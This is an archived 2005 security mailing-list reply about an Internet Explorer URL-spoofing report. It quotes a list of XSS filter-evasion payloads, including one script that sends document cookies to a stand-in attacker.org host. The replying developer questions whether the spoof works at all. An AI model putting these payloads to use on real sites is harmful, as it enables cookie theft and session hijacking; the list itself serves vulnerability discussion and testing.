[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <43583F9B.7070309@logicaldevelopments.com.au>
Date: Fri Oct 21 02:09:26 2005
From: jallen at logicaldevelopments.com.au (Justin Allen)
Subject: New (19.10.05) MS-IE Url Spoofing bug
(by K-Gen).
Did you even test those URLs? The only thing that happens is a message
box pops up, the status bar text also states that a message box will pop
up. The only thing it does is change the tooltip on the link to google.com.
--
Justin Allen
Software Developer
Logical Developments
Phone: +61 8 9458 3889
Jerome Athias wrote:
>You can then mix it with some classical XSS tricks like
>
>Basic XSS test detected:
>
><a href="javascript:alert('XSS')" title="http://www.google.com">hello0</a>
><a
>href="http://www.target.com/foo<script>document.location='http://www.attacker.org/?'
>+document.cookies</script>">Click here</a>
>
>
>Basic XSS test :
>
><a href="JaVaScRiPt:alert('XSS')" title="http://www.google.com">hello0</a>
>
>UTF-8:
>
><a
>href="javascript:alert('XSS')"
>title="http://www.google.com">hello</a>
>
>Long UTF-8 Unicode encoding without semicolons:
>
><a
>href= javascript:alert('XSS')
>title="http://www.google.com"
>onMouseOver="pop('http://www.google.com');" onmouseout="kill()">hello</a>
>
>Embedded newline to break up XSS:
>
><a href=jav
ascript:alert('XSS'); title="http://www.google.com"
>hover="http://www.google.com">hello2</a>
>
>Embedded carriage return to break up XSS (doesn't appear as link):
>
><a href=jav
ascript:alert('XSS'); title="http://www.google.com"
>onmouseover="image(this.href);">hello3</a>
>
>Inserting spaces in href link:
>
><a href=" javascript:alert('XSS');" title="http://www.google.com">hello4</a>
>
>
>etc...
>
>some bypass the Opera anti-illegal-urls
>
>
>
Powered by blists - more mailing lists